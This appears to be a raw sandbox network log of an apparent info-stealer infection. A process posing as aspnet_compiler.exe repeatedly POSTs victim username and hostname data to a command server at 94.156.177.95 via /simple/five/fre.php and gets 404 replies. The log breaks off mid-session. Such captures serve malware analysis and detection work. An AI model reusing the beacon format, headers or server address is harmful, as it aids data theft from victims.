Nov 15, 2024 18:15:18.643546104 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:18.648637056 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:19.617989063 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49999	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:19.766031981 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:19.770914078 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:20.776741982 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50006	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:21.177195072 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:21.183193922 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:22.095532894 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50014	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:22.271795988 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:22.276771069 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:23.204288960 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50022	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:23.381226063 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:23.386904955 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:24.317574978 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50023	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:24.481081009 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:24.486068010 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:26.041918993 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50024	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:26.193200111 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:26.198172092 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:27.521374941 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50025	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:27.675182104 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:27.680896997 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:28.641117096 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50026	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:28.788830042 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:28.793698072 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:29.754606009 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50027	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:29.920413017 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:29.925407887 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:30.894785881 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50028	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:31.047650099 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:31.052611113 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:32.048650980 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50029	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:32.208452940 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:32.214107990 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:33.168128967 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50030	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:33.327476978 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:33.332376003 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:34.322305918 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50031	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:34.474889040 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:34.479836941 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:35.458338022 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50032	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:35.613207102 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:35.618187904 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:36.584152937 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50033	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:36.740186930 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:36.745165110 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:37.681458950 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50034	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:37.830840111 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:37.835645914 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:38.775286913 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50035	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:38.925018072 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:38.930011034 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:39.883445024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50036	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:40.036921024 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:40.041826010 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:40.977866888 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50037	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:41.128297091 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:41.133212090 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:42.128469944 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50038	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:42.282579899 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
